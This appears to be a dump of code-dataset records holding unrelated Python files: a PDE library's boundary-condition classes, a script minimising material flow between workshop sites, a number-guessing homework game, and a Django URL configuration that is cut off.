\n \n def __init__(self, grid: GridBase, axis: int, upper: bool, value=0):\n \"\"\" \n Args:\n grid (:class:`~pde.grids.GridBase`):\n The grid for which the boundary conditions are defined\n axis (int):\n The axis to which this boundary condition is associated\n upper (bool):\n Flag indicating whether this boundary condition is associated\n with the upper side of an axis or not. In essence, this\n determines the direction of the local normal vector of the\n boundary.\n value (float or str or array):\n a value stored with the boundary condition. The interpretation\n of this value depends on the type of boundary condition. 
If\n value is a single value (or tensor in case of tensorial boundary\n conditions), the same value is applied to all points.\n Inhomogeneous boundary conditions are possible by supplying an\n expression as a string, which then may depend on the axes names\n of the respective grid.\n \"\"\"\n self.grid = grid\n self.axis = axis\n self.upper = upper\n self.set_value(value)\n \n \n def set_value(self, value=0):\n \"\"\" set the value of this boundary condition\n \n Args:\n value (float or str or array):\n a value stored with the boundary condition. The interpretation\n of this value depends on the type of boundary condition.\n \"\"\"\n self._value_expression = value\n \n if isinstance(value, str):\n # inhomogeneous value given by an expression\n self.homogeneous = False\n\n # determine which coordinates are allowed to vary\n axes_ids = (list(range(self.axis)) +\n list(range(self.axis + 1, self.grid.num_axes)))\n \n # parse the expression with the correct variables\n bc_vars = [self.grid.axes[i] for i in axes_ids]\n expr = ScalarExpression(value, bc_vars)\n \n # determine the value at each boundary position\n bc_coords = np.meshgrid(*[self.grid.axes_coords[i]\n for i in axes_ids],\n indexing='ij')\n self.value = expr(**{name: value\n for name, value in zip(bc_vars, bc_coords)})\n \n elif np.isscalar(value):\n # homogeneous, scalar value\n self.homogeneous = True\n self.value = float(value)\n \n else:\n # assume a homogeneous, tensorial value\n self.homogeneous = True\n self.value = np.array(value, dtype=np.double)\n # check whether the value is actually a scalar. This is necessary\n # since np.isscalar(np.array(0)) == False\n if self.value.ndim == 0:\n self.value = float(self.value)\n \n\n def __init_subclass__(cls, **kwargs): # @NoSelf\n \"\"\" register all subclasses to reconstruct them later \"\"\"\n super().__init_subclass__(**kwargs)\n cls._subclasses[cls.__name__] = cls\n if hasattr(cls, 'names'):\n for name in cls.names:\n cls._conditions[name] = cls\n\n\n @classmethod\n def get_help(cls) -> str:\n \"\"\" Return information on how boundary conditions can be set \"\"\"\n types = ', '.join(f\"'{subclass.names[0]}'\"\n for subclass in cls._subclasses.values()\n if hasattr(subclass, 'names'))\n return (f\"Possible types of boundary conditions are {types}. \"\n \"Values can be set using {'type': TYPE, 'value': VALUE}. \"\n \"Here, VALUE can be a scalar number, a vector for tensorial \"\n \"boundary conditions, or a string, which can be interpreted \"\n \"as a sympy expression. In the latter case, the names of the \"\n \"axes not associated with this boundary can be used as \"\n \"variables to describe inhomogeneous boundary conditions.\")\n\n \n def __repr__(self):\n if np.array_equal(self.value, 0):\n return (f\"{self.__class__.__name__}(\"\n f\"axis={self.axis}, upper={self.upper}, \"\n f\"homogeneous={self.homogeneous})\")\n else:\n return (f\"{self.__class__.__name__}(\"\n f\"axis={self.axis}, upper={self.upper}, \"\n f\"homogeneous={self.homogeneous}, value={self.value!r})\")\n \n \n def __str__(self):\n if hasattr(self, 'names'):\n if np.array_equal(self.value, 0):\n return f'\"{self.names[0]}\"'\n elif self.homogeneous:\n return (f'{{\"type\": \"{self.names[0]}\", '\n f'\"value\": {self.value}}}')\n else:\n return (f'{{\"type\": \"{self.names[0]}\", '\n f'\"value\": \"{self._value_expression}\"}}')\n else:\n raise RuntimeError('This class should not be used directly')\n \n \n def __eq__(self, other):\n \"\"\" checks for equality neglecting the `upper` property \"\"\"\n return (self.__class__ == other.__class__ and\n self.grid == other.grid and\n self.axis == other.axis and\n self.homogeneous == other.homogeneous and\n np.all(self.value == other.value))\n \n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n\n def copy(self, upper: Optional[bool] = None, value=None) -> \"BCBase\":\n \"\"\" return a copy of itself, but with a reference to the same grid \"\"\"\n if upper is None:\n upper = self.upper\n if value is None:\n value = self._value_expression\n return self.__class__(grid=self.grid, axis=self.axis, upper=upper,\n value=value)\n \n \n @property\n def rank(self) -> int:\n \"\"\" return the rank of the boundary condition \"\"\"\n if self.homogeneous:\n if np.isscalar(self.value):\n return 0\n else:\n return self.value.ndim # type: ignore\n else:\n return 0 # only scalar values by definition\n \n \n @property\n def is_scalar(self) -> bool:\n \"\"\" bool: whether the boundary condition is a scalar \"\"\"\n return self.rank == 0\n \n\n def extract_component(self, *indices):\n \"\"\" extracts the boundary conditions for the given component\n\n Args:\n *indices:\n One or two indices for vector or tensor fields, respectively\n \"\"\"\n if not self.homogeneous:\n raise NotImplementedError('Only homogeneous boundary conditions '\n 'support tensorial values')\n \n if np.array_equal(self.value, 0): # special case for all ranks\n value = 0\n \n elif len(indices) == 0: # scalar conditions\n value = self.value\n \n else: # tensorial boundary conditions\n value = self.value[indices]\n \n return self.copy(value=value)\n\n \n @classmethod\n def from_str(cls, grid: GridBase, axis: int, upper: bool, condition: str,\n value=0, **kwargs) -> \"BCBase\":\n r\"\"\" creates boundary from a given string identifier\n \n Args:\n grid (:class:`~pde.grids.GridBase`):\n The grid for which the boundary conditions are defined\n axis (int):\n The axis to which this boundary condition is associated\n upper (bool):\n Indicates whether this boundary condition is associated with the\n upper or lower side of the axis.\n condition (str):\n Identifies the boundary condition\n value (float or str or array):\n Sets the associated value\n \\**kwargs:\n Additional arguments passed to the constructor\n \"\"\"\n if condition == 'no-flux' and np.all(value == 0):\n condition = 'derivative'\n\n # extract the class\n try:\n boundary_class = cls._conditions[condition]\n except KeyError:\n raise ValueError(f'Boundary condition `{condition}` not defined. 
'\n f'{cls.get_help()}')\n\n # create the actual class \n return boundary_class(grid=grid, axis=axis, upper=upper, # type: ignore\n value=value, **kwargs)\n \n \n @classmethod\n def from_dict(cls, grid: GridBase, axis: int, upper: bool,\n data: Dict[str, Any]) -> \"BCBase\":\n \"\"\" create boundary from data given in dictionary\n \n Args:\n grid (:class:`~pde.grids.GridBase`):\n The grid for which the boundary conditions are defined\n axis (int):\n The axis to which this boundary condition is associated\n upper (bool):\n Indicates whether this boundary condition is associated with the\n upper or lower side of the axis.\n data (dict):\n The dictionary defining the boundary condition\n \"\"\"\n data = data.copy() # need to make a copy since we modify it below\n \n # parse all possible variants that could be given\n if data.keys() == {'value'}:\n # only a value is given => Assume Dirichlet conditions\n b_type = 'value'\n b_value = data.pop('value')\n \n elif data.keys() == {'derivative'}:\n # the derivative is obviously given => Assume Neumann conditions\n b_type = 'derivative'\n b_value = data.pop('derivative')\n \n elif data.keys() == {'mixed'}:\n # short notation for mixed condition\n b_type = 'mixed'\n b_value = data.pop('mixed')\n \n elif data.keys() == {'curvature'}:\n # short notation for curvature condition\n b_type = 'curvature'\n b_value = data.pop('curvature')\n \n elif 'type' in data.keys():\n # type is given (optionally with a value)\n b_type = data.pop('type')\n b_value = data.pop('value', 0)\n \n else:\n raise ValueError('Boundary condition defined by '\n f'{str(list(data.keys()))} are not supported.')\n \n # initialize the boundary class with all remaining values forwarded\n return cls.from_str(grid, axis, upper, condition=b_type, value=b_value,\n **data)\n \n \n @classmethod\n def from_data(cls, grid: GridBase, axis: int, upper: bool,\n data: BoundaryData) -> \"BCBase\":\n \"\"\" create boundary from some data\n\n Args:\n grid (:class:`~pde.grids.GridBase`):\n The grid for which the boundary conditions are defined\n axis (int):\n The axis to which this boundary condition is associated\n upper (bool):\n Indicates whether this boundary condition is associated with the\n upper or lower side of the axis.\n data (str or dict):\n Data that describes the boundary\n \n Returns:\n :class:`~pde.grids.boundaries.local.BCBase`: the instance created\n from the data\n \n Throws:\n ValueError if `data` cannot be interpreted as a boundary condition\n \"\"\"\n # check all different data formats\n if isinstance(data, BCBase):\n # already in the correct format\n assert data.grid == grid and data.axis == axis\n return data.copy(upper=upper)\n \n elif isinstance(data, dict):\n # create from dictionary\n return cls.from_dict(grid, axis, upper=upper, data=data)\n \n elif isinstance(data, str):\n # create a specific condition given by a string\n return cls.from_str(grid, axis, upper=upper, condition=data)\n \n else:\n raise ValueError(f'Unsupported boundary format: `{data}`. 
'\n f'{cls.get_help()}')\n\n\n def check_value_rank(self, rank: int):\n \"\"\" check whether the values at the boundaries have the correct rank\n \n Args:\n rank (tuple): The rank of the value that is stored with this\n boundary condition\n \n Throws:\n RuntimeError: if the value does not have rank `rank`\n \"\"\"\n if self.homogeneous:\n if np.isscalar(self.value) and self.value == 0:\n return True\n \n elif rank == 0:\n if self.rank != 0:\n raise RuntimeError('Expected scalar boundary condition but '\n f'got `{self.value}`')\n \n elif np.isscalar(self.value): # self.value != 0\n raise RuntimeError('Expected boundary condition of rank '\n f'{rank} but got scalar `{self.value}`')\n \n elif self.value.shape != (self.grid.dim,) * rank:\n raise RuntimeError('Expected boundary condition of rank '\n f'{rank} but got shape `{self.value.shape}`')\n \n else:\n # inhomogeneous boundary conditions\n if rank != 0:\n raise NotImplementedError('Only homogeneous tensorial boundary '\n 'conditions are supported')\n \n return True\n \n \n @abstractmethod\n def get_virtual_point(self, arr, idx: Tuple[int, ...] = None) -> float: pass\n \n @abstractmethod\n def get_virtual_point_evaluator(self) -> Callable: pass\n \n @abstractmethod\n def get_adjacent_evaluator(self) -> Callable: pass\n \n @property\n def differentiated(self) -> \"BCBase\": \n \"\"\" BCBase: differentiated version of this boundary condition \"\"\"\n raise NotImplementedError\n\n\n\nclass BCBase1stOrder(BCBase):\n \"\"\" represents a single boundary in an BoundaryPair instance \"\"\"\n\n\n @abstractmethod\n def get_virtual_point_data(self) -> Tuple[Any, Any, int]: pass\n\n\n def get_virtual_point(self, arr, idx: Tuple[int, ...] = None) -> float:\n \"\"\" calculate the value of the virtual point outside the boundary \n \n Args:\n arr (array): The data values associated with the grid\n idx (tuple): The index of the point to evaluate. This is a tuple of\n length `grid.num_axes` with the either -1 or `dim` as the entry\n for the axis associated with this boundary condition. Here,\n `dim` is the dimension of the axis. The index is optional if\n dim == 1. \n \n Returns:\n float: Value at the virtual support point\n \"\"\"\n if idx is None:\n if self.grid.num_axes == 1:\n idx = (self.grid.shape[0] if self.upper else -1,)\n else:\n raise ValueError('Index `idx` can only be deduced for grids '\n 'with a single axis.')\n \n # extract the 1d array\n arr_1d, _, bc_idx = _get_arr_1d(arr, idx, axis=self.axis)\n \n # calculate necessary constants\n data = self.get_virtual_point_data()\n \n if self.homogeneous:\n return (data[0] + # type: ignore\n data[1] * arr_1d[..., data[2]])\n else:\n return (data[0][bc_idx] + # type: ignore\n data[1][bc_idx] * arr_1d[..., data[2]])\n\n\n def get_virtual_point_evaluator(self) -> Callable:\n \"\"\" returns a function evaluating the value at the virtual support point\n\n Returns:\n function: A function that takes the data array and an index marking\n the current point, which is assumed to be a virtual point. 
The\n result is the data value at this point, which is calculated using\n the boundary condition.\n \"\"\"\n dx = self.grid.discretization[self.axis]\n get_arr_1d = _make_get_arr_1d(self.grid.num_axes, self.axis)\n \n if not isinstance(dx, numbers.Number):\n raise ValueError(f'Discretization along axis {self.axis} must be a '\n f'number, not `{dx}`')\n\n # calculate necessary constants\n data = self.get_virtual_point_data()\n \n if self.homogeneous:\n @jit\n def virtual_point(arr, idx: Tuple[int, ...]) -> float:\n \"\"\" evaluate the virtual point at `idx` \"\"\"\n arr_1d, _, _ = get_arr_1d(arr, idx)\n return (data[0] + # type: ignore\n data[1] * arr_1d[..., data[2]])\n \n else:\n @jit\n def virtual_point(arr, idx: Tuple[int, ...]) -> float:\n \"\"\" evaluate the virtual point at `idx` \"\"\"\n arr_1d, _, bc_idx = get_arr_1d(arr, idx)\n return (data[0][bc_idx] + # type: ignore\n data[1][bc_idx] * arr_1d[..., data[2]])\n \n return virtual_point # type: ignore\n \n \n def get_adjacent_evaluator(self) -> Callable:\n \"\"\" returns a function evaluating the value adjacent to a given point \n\n Returns:\n function: A function that takes the data array and an index marking\n the current point. The result is the data value at the adjacent \n point along the axis associated with this boundary condition in the\n upper (lower) direction when `upper` is True (False).\n \"\"\"\n size = self.grid.shape[self.axis]\n upper = self.upper\n dx = self.grid.discretization[self.axis]\n get_arr_1d = _make_get_arr_1d(self.grid.num_axes, self.axis)\n \n if not isinstance(dx, numbers.Number):\n raise ValueError(f'Discretization along axis {self.axis} must be a '\n f'number, not `{dx}`')\n\n # calculate necessary constants\n data_vp = self.get_virtual_point_data()\n \n if self.homogeneous:\n # the boundary condition does not depend on space\n if self.is_scalar:\n zero = 0.\n else:\n zero = np.zeros((self.grid.dim,) * self.rank)\n \n @jit\n def adjacent_point(arr, idx: Tuple[int, ...]) -> float:\n \"\"\" evaluate the point adjacent to `idx` \"\"\"\n # extract the 1d array\n arr_1d, i, _ = get_arr_1d(arr, idx)\n\n # determine the parameters for evaluating adjacent point. Note\n # that this is an optimization that apparently accelerates the\n # computation. 
The alternative direct calculation (that is also\n # used in the inhomogeneous case below) turned out to be\n # significantly slower.\n if upper:\n if i == size - 1:\n data = data_vp\n else:\n data = (zero, 1., i + 1)\n else:\n if i == 0:\n data = data_vp\n else:\n data = (zero, 1., i - 1)\n \n # calculate the values\n return (data[0] + # type: ignore\n data[1] * arr_1d[..., data[2]])\n \n else:\n # the boundary condition is a function of space\n \n @jit\n def adjacent_point(arr, idx: Tuple[int, ...]) -> float:\n \"\"\" evaluate the point adjacent to `idx` \"\"\"\n arr_1d, i, bc_idx = get_arr_1d(arr, idx)\n\n # determine the parameters for evaluating adjacent point\n if upper:\n if i == size - 1:\n val = (data_vp[0][bc_idx] +\n data_vp[1][bc_idx] * arr_1d[..., data_vp[2]])\n else:\n val = arr_1d[..., i + 1]\n else:\n if i == 0:\n val = (data_vp[0][bc_idx] +\n data_vp[1][bc_idx] * arr_1d[..., data_vp[2]])\n else:\n val = arr_1d[..., i - 1]\n \n return val # type: ignore\n \n return adjacent_point # type: ignore\n \n\n\nclass DirichletBC(BCBase1stOrder):\n \"\"\" represents a boundary condition imposing the value \"\"\"\n \n names = ['value', 'dirichlet'] # identifiers for this boundary condition\n\n \n def get_virtual_point_data(self) -> Tuple[Any, float, int]:\n \"\"\" return data suitable for calculating virtual points\n \n Returns:\n tuple: the data structure associated with this virtual point\n \"\"\"\n size = self.grid.shape[self.axis]\n \n # the virtual point mirrors the last support point, so that the average\n # of the two equals the imposed value: c_virtual = 2 * value - c_last\n value = 2 * self.value\n factor = -1 if np.isscalar(value) else -np.ones_like(self.value)\n if self.upper:\n idx = size - 1\n else:\n idx = 0\n return (value, factor, idx)\n \n \n @property\n def differentiated(self) -> BCBase:\n \"\"\" BCBase: differentiated version of this boundary condition \"\"\"\n return NeumannBC(grid=self.grid, axis=self.axis, upper=self.upper,\n value=np.zeros_like(self.value))\n\n\n\nclass NeumannBC(BCBase1stOrder):\n \"\"\" represents a boundary condition imposing the derivative in the outward\n normal direction of the boundary \"\"\"\n \n names = ['derivative', 'neumann'] # identifiers for this boundary condition\n\n \n def get_virtual_point_data(self) -> Tuple[Any, float, int]:\n \"\"\" return data suitable for calculating virtual points\n \n Returns:\n tuple: the data structure associated with this virtual point\n \"\"\"\n size = self.grid.shape[self.axis]\n dx = self.grid.discretization[self.axis]\n \n # impose the outward derivative: (c_virtual - c_last) / dx = value\n value = dx * self.value\n factor = 1 if np.isscalar(value) else np.ones_like(self.value)\n if self.upper:\n idx = size - 1\n else:\n idx = 0\n return (value, factor, idx)\n\n\n @property\n def differentiated(self) -> BCBase:\n \"\"\" BCBase: differentiated version of this boundary condition \"\"\"\n return CurvatureBC(grid=self.grid, axis=self.axis, upper=self.upper,\n value=np.zeros_like(self.value))\n\n\n\nclass MixedBC(BCBase1stOrder):\n r\"\"\" represents a mixed (or Robin) boundary condition imposing a derivative\n in the outward normal direction of the boundary that is given by an affine\n function involving the actual value:\n \n .. math::\n \\partial_n c + \\gamma c = \\beta\n \n Here, :math:`c` is the field to which the condition is applied,\n :math:`\\gamma` quantifies the influence of the field and :math:`\\beta` is\n the constant term. Note that :math:`\\gamma = 0` corresponds\n to Neumann conditions imposing :math:`\\beta` as the derivative.\n Conversely, :math:`\\gamma \\rightarrow \\infty` corresponds to Dirichlet\n conditions imposing a zero value on :math:`c`. 
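\n\n Numerically, the virtual support point behind the boundary is obtained by\n discretizing the outward derivative as :math:`(c_\\mathrm{virt} -\n c_\\mathrm{last}) / \\Delta x` and the boundary value as the average\n :math:`(c_\\mathrm{virt} + c_\\mathrm{last}) / 2`; solving the condition\n for :math:`c_\\mathrm{virt}` yields the coefficients returned by\n :meth:`get_virtual_point_data` below.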
\n \"\"\"\n \n names = ['mixed', 'robin']\n \n def __init__(self, grid: GridBase, axis: int, upper: bool, value=0,\n const: float = 0):\n r\"\"\" \n Args:\n grid (:class:`~pde.grids.GridBase`):\n The grid for which the boundary conditions are defined\n axis (int):\n The axis to which this boundary condition is associated\n upper (bool):\n Flag indicating whether this boundary condition is associated\n with the upper side of an axis or not. In essence, this\n determines the direction of the local normal vector of the\n boundary.\n value (float or str or array):\n The parameter :math:`\\gamma` quantifying the influence of the\n field onto its normal derivative. If `value` is a single value\n (or tensor in case of tensorial boundary conditions), the same\n value is applied to all points. Inhomogeneous boundary\n conditions are possible by supplying an expression as a string,\n which then may depend on the axes names of the respective grid.\n const (float):\n The parameter :math:`\\beta` determining the constant term for \n the boundary condition. This term does not yet allow for\n tensorial or spatially varying values.\n \"\"\"\n super().__init__(grid, axis, upper, value)\n # TODO: support spatially varying constant terms β\n self.const = float(const) \n \n def __eq__(self, other):\n \"\"\" checks for equality neglecting the `upper` property \"\"\"\n return super().__eq__(other) and self.const == other.const\n\n\n def copy(self, upper: Optional[bool] = None, value=None, const=None) \\\n -> \"MixedBC\":\n \"\"\" return a copy of itself, but with a reference to the same grid \"\"\"\n if upper is None:\n upper = self.upper\n if value is None:\n value = self._value_expression\n if const is None:\n const = self.const\n return self.__class__(grid=self.grid, axis=self.axis, upper=upper,\n value=value, const=const) \n \n \n def get_virtual_point_data(self) -> Tuple[Any, float, int]:\n \"\"\" return data suitable for calculating virtual points\n \n Returns:\n tuple: the data structure associated with this virtual point\n \"\"\" \n size = self.grid.shape[self.axis]\n dx = self.grid.discretization[self.axis]\n \n factor = dx * self.value\n if np.isscalar(factor):\n if np.isinf(factor):\n value = 0\n factor = -1\n else:\n value = 2 * dx * self.const / (2 + factor)\n factor = (2 - factor) / (2 + factor)\n else:\n # calculate values assuming finite factor\n value = 2 * dx * self.const / (2 + factor)\n factor = (2 - factor) / (2 + factor)\n # correct at places of infinite values \n value[np.isinf(factor)] = 0 # type: ignore\n factor[np.isinf(factor)] = -1\n \n if self.upper:\n idx = size - 1\n else:\n idx = 0\n return (value, factor, idx)\n \n\n\nclass BCBase2ndOrder(BCBase):\n \"\"\" abstract base class for boundary conditions of 2nd order \"\"\"\n \n \n @abstractmethod\n def get_virtual_point_data(self) -> Tuple[Any, Any, int, Any, int]:\n \"\"\" return data suitable for calculating virtual points\n \n Returns:\n tuple: the data associated with this virtual point \n \"\"\" \n\n \n def get_virtual_point(self, arr, idx: Tuple[int, ...] = None) -> float:\n \"\"\" calculate the value of the virtual point outside the boundary \n \n Args:\n arr (array): The data values associated with the grid\n idx (tuple): The index of the point to evaluate. This is a tuple of\n length `grid.num_axes` with the either -1 or `dim` as the entry\n for the axis associated with this boundary condition. Here,\n `dim` is the dimension of the axis. The index is optional if\n dim == 1. 
\n \n Returns:\n float: Value at the virtual support point\n \"\"\"\n if idx is None:\n if self.grid.num_axes == 1:\n idx = (self.grid.shape[0] if self.upper else -1,)\n else:\n raise ValueError('Index `idx` can only be deduced for grids '\n 'with a single axis.')\n\n # extract the 1d array\n arr_1d, _, bc_idx = _get_arr_1d(arr, idx, axis=self.axis)\n \n # calculate necessary constants\n data = self.get_virtual_point_data()\n \n if self.homogeneous:\n return (data[0] + # type: ignore\n data[1] * arr_1d[..., data[2]] + \n data[3] * arr_1d[..., data[4]])\n else:\n return (data[0][bc_idx] + # type: ignore\n data[1][bc_idx] * arr_1d[..., data[2]] +\n data[3][bc_idx] * arr_1d[..., data[4]])\n \n \n def get_virtual_point_evaluator(self) -> Callable:\n \"\"\" returns a function evaluating the value at the virtual support point\n\n Returns:\n function: A function that takes the data array and an index marking\n the current point, which is assumed to be a virtual point. The\n result is the data value at this point, which is calculated using\n the boundary condition.\n \"\"\"\n size = self.grid.shape[self.axis]\n dx = self.grid.discretization[self.axis]\n get_arr_1d = _make_get_arr_1d(self.grid.num_axes, self.axis)\n \n if size < 2:\n raise ValueError('Need at least two support points along axis '\n f'{self.axis} to apply boundary conditions')\n if not isinstance(dx, numbers.Number):\n raise ValueError(f'Discretization along axis {self.axis} must be a '\n f'number, not `{dx}`')\n\n # calculate necessary constants\n data = self.get_virtual_point_data()\n \n if self.homogeneous:\n @jit\n def virtual_point(arr, idx: Tuple[int, ...]):\n \"\"\" evaluate the virtual point at `idx` \"\"\"\n arr_1d, _, _ = get_arr_1d(arr, idx)\n \n return (data[0] +\n data[1] * arr_1d[..., data[2]] +\n data[3] * arr_1d[..., data[4]])\n \n else:\n @jit\n def virtual_point(arr, idx: Tuple[int, ...]):\n \"\"\" evaluate the virtual point at `idx` \"\"\"\n arr_1d, _, bc_idx = get_arr_1d(arr, idx)\n \n return (data[0][bc_idx] +\n data[1][bc_idx] * arr_1d[..., data[2]] +\n data[3][bc_idx] * arr_1d[..., data[4]])\n \n return virtual_point # type: ignore\n \n\n def get_adjacent_evaluator(self) -> Callable:\n \"\"\" returns a function evaluating the value adjacent to a given point \n\n Returns:\n function: A function that takes the data array and an index marking\n the current point. 
The result is the data value at the adjacent \n point along the axis associated with this boundary condition in the\n upper (lower) direction when `upper` is True (False).\n \"\"\"\n size = self.grid.shape[self.axis]\n upper = self.upper\n dx = self.grid.discretization[self.axis]\n get_arr_1d = _make_get_arr_1d(self.grid.num_axes, self.axis)\n \n if size < 2:\n raise ValueError('Need at least two support points along axis '\n f'{self.axis} to apply boundary conditions')\n if not isinstance(dx, numbers.Number):\n raise ValueError(f'Discretization along axis {self.axis} must be a '\n f'number, not `{dx}`')\n\n # calculate necessary constants\n data_vp = self.get_virtual_point_data()\n \n if self.homogeneous:\n # the boundary condition does not depend on space\n if self.is_scalar:\n zero = 0.\n else:\n zero = np.zeros((self.grid.dim,) * self.rank)\n \n @jit\n def adjacent_point(arr, idx: Tuple[int, ...]):\n \"\"\" evaluate the point adjacent to `idx` \"\"\"\n # extract the 1d array\n arr_1d, i, _ = get_arr_1d(arr, idx)\n\n # determine the parameters for evaluating adjacent point\n if upper:\n if i == size - 1:\n data = data_vp\n else:\n data = (zero, 1., i + 1, 0., 0)\n else:\n if i == 0:\n data = data_vp\n else:\n data = (zero, 1., i - 1, 0., 0)\n \n # calculate the values\n return (data[0] +\n data[1] * arr_1d[..., data[2]] +\n data[3] * arr_1d[..., data[4]])\n \n else:\n # the boundary condition is a function of space\n \n @jit\n def adjacent_point(arr, idx: Tuple[int, ...]):\n \"\"\" evaluate the point adjacent to `idx` \"\"\"\n arr_1d, i, bc_idx = get_arr_1d(arr, idx)\n\n # determine the parameters for evaluating adjacent point\n if upper:\n if i == size - 1:\n val = (data_vp[0][bc_idx] +\n data_vp[1][bc_idx] * arr_1d[..., data_vp[2]] + \n data_vp[3][bc_idx] * arr_1d[..., data_vp[4]])\n else:\n val = arr_1d[..., i + 1]\n else:\n if i == 0:\n val = (data_vp[0][bc_idx] +\n data_vp[1][bc_idx] * arr_1d[..., data_vp[2]] +\n data_vp[3][bc_idx] * arr_1d[..., data_vp[4]])\n else:\n val = arr_1d[..., i - 1]\n \n return val\n \n return adjacent_point # type: ignore \n\n\n\nclass ExtrapolateBC(BCBase2ndOrder):\n \"\"\" represents a boundary condition that extrapolates the virtual point\n using two points close to the boundary\n \n This imposes a vanishing second derivative.\n \"\"\"\n \n names = ['extrapolate', 'extrapolation'] # identifiers for this condition \n\n \n def get_virtual_point_data(self) -> Tuple[float, float, int, float, int]:\n \"\"\" return data suitable for calculating virtual points\n \n Returns:\n tuple: the data structure associated with this virtual point\n \"\"\" \n size = self.grid.shape[self.axis]\n \n if size < 2:\n raise RuntimeError('Need at least 2 support points to use the '\n 'extrapolate boundary condition.')\n\n if self.upper:\n i1 = size - 1\n i2 = size - 2\n else:\n i1 = 0\n i2 = 1\n return (0., 2., i1, -1., i2)\n\n\n\nclass CurvatureBC(BCBase2ndOrder):\n \"\"\" represents a boundary condition imposing the 2nd derivative at the\n boundary \"\"\"\n \n names = ['curvature', 'second_derivative'] # identifiers for this BC \n\n \n def get_virtual_point_data(self) -> Tuple[Any, float, int, float, int]:\n \"\"\" return data suitable for calculating virtual points\n \n Returns:\n tuple: the data structure associated with this virtual point\n \"\"\" \n size = self.grid.shape[self.axis]\n dx = self.grid.discretization[self.axis]\n \n if size < 2:\n raise RuntimeError('Need at least 2 support points to use the '\n 'curvature boundary condition.')\n\n value = self.value * 
dx**2\n ones = 1 if np.isscalar(value) else np.ones_like(value)\n if self.upper:\n f1, i1 = 2., size - 1\n f2, i2 = -1., size - 2\n else:\n f1, i1 = 2., 0\n f2, i2 = -1., 1\n return (value, f1 * ones, i1, f2 * ones, i2)\n","sub_path":"pde/grids/boundaries/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":42400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"}
{"seq_id":"404319171","text":"# Compute the from-to chart (material flow between processing sites)\nimport numpy as np\nimport pandas as pd\n\n#———————————————————————— data to edit for a concrete problem ————————————————————————#\n\n# raw material warehouse A, foundry B, heat-treatment shop C, machining shop D,\n# precision shop E, semi-finished standard parts warehouse F\n# series of the processing sites\nobj=pd.Series(['A','B','C','D','E','F'],index=[1,2,3,4,5,6])\n#print(obj)\n# dictionary of parts. part name: [weight, [processing sequence]]\nparts={'s1':[9,['A','D','C','F']],\n 's2':[90,['A','B','D','E','F']],\n 's3':[3,['A','B','D','F']],\n 's4':[3,['A','D','E','F']],\n 's5':[27,['A','D','E','F']],\n 's6':[700,['A','B','D','E','F']],\n 's7':[60,['A','D','C','E','F']],\n 's8':[56,['A','D','E','F']],\n 's9':[32,['A','D','F']],\n 's10':[1,['A','D','C','E','F']],\n 's11':[120,['A','C','D','C','E','F']],\n 's12':[60,['A','C','D','C','E','F']],\n 's13':[80,['A','D','C','F']]\n }\n\n#———————————————————————— all permutations of the site array ————————————————————————#\n\nm=len(obj) # number of processing sites\nobj_sort=[i for i in range(1, m+1)] # list to permute\n\ndef AllRange(listx,p,q): # recursively generate all permutations into all_sorts\n if p == q:\n all_sorts.append(list(listx))\n else:\n for i in range(p,q):\n listx[i],listx[p]=listx[p],listx[i]\n AllRange(listx,p+1,q)\n listx[i],listx[p]=listx[p],listx[i]\n \nall_sorts=[] # list of all possible permutations\nAllRange(obj_sort,0,len(obj_sort))\n\n#———————————————————— find the ordering with the minimal flow ————————————————————#\n\nmin_flow=100000000 # minimal flow; initialize to a sufficiently large value\nbest_sort=[] # ordering that achieves the minimal flow\n\n# compute the flow of a single part under a given ordering\ndef one_part_folw(info,now_range):\n p_flow=0 # flow without the weight applied\n n=len(info[1])\n for i in range(n-1): # position of each step (e.g. step A maps to label 1) in the new ordering\n index_f=obj[obj.values==info[1][i]].index # label corresponding to the step\n index_l=obj[obj.values==info[1][i+1]].index\n f=now_range.index(index_f)\n l=now_range.index(index_l)\n if f > l:\n p_flow += (f-l)*2\n else:\n p_flow += (l-f)\n\n total_flow=p_flow*info[0]\n return total_flow\n\n# find the minimal flow over all permutations and the corresponding ordering\nfor all_sort in all_sorts[:]:\n now_flow=0 # flow of the current permutation\n for part in parts.values():\n part_flow=one_part_folw(part,all_sort) # flow of each part\n now_flow += part_flow\n\n if now_flow <= min_flow:\n min_flow=now_flow\n best_sort=all_sort[:]\n\n#———————————————————————————— output the results ————————————————————————————#\n\nprint('min flow:')\nprint(min_flow)\nprint('best sort:')\nfor i in range(m):\n print(obj[best_sort[i]])\n","sub_path":"my_exa/计算从至表/计算从至表.py","file_name":"计算从至表.py","file_ext":"py","file_size_in_byte":3303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"}
{"seq_id":"381894316","text":"#Homework 1 - Sam Lee\n#This program guesses the user's number\n\ndef next_guess_number(low, high):\n '''Returns the next number to guess'''\n\n return (low + high) // 2\n\ndef control_game():\n '''Main Game Controller'''\n\n name = input('What is your name? ')\n print('Hello ' + name + '! Think of a number between 1 and 100.')\n print('I will try to guess it!\\n')\n\n #initialize to start loop\n play_again = 'yes'\n\n while play_again.lower() == 'yes':\n play()\n play_again = input(\"Do you want to play again? 
(yes/no) \")\n\n print (\"Bye-Bye!!\")\n\n\ndef play():\n low = 0\n high = 100\n tries = 0\n\n while True:\n #Get the next guess, increment the guess tries, and ask if correct\n current_num = next_guess_number(low, high)\n tries = tries + 1\n response = input('Is your number {}? (yes/no) '.format(current_num))\n\n #Guessed correct number so break out of loop\n if response.lower() == 'yes':\n print (\"YAY! IT TOOK {} TRIES\".format(tries))\n break\n\n range_response = input('Is your number higher? (yes/no) ')\n\n #Set the highest or lowest possible value based on response\n if range_response == 'yes':\n low = current_num + 1\n else:\n high = current_num - 1\n\n#Start the program by calling Game Controller\ncontrol_game()\n","sub_path":"homework1.py","file_name":"homework1.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"83399118","text":"from __future__ import unicode_literals\nfrom django.conf.urls import patterns, include, url\nfrom django.views.generic import ListView, DetailView\nfrom proj.models import Blog, Circulos, CirculoForum, Musica, Participante\n\n\n\nurlpatterns = patterns('', \n\turl(r'^$', ListView.as_view(\n\t\tqueryset=Blog.objects.all().order_by(\"-date\")[:0],\n\t\ttemplate_name=\"base.html\")),\n\n\n\turl(r'^blog/$', 'proj.views.blog_view', name= 'blog_view'),\n\n\turl(r'^blog/(?P[0-9]+)/$', 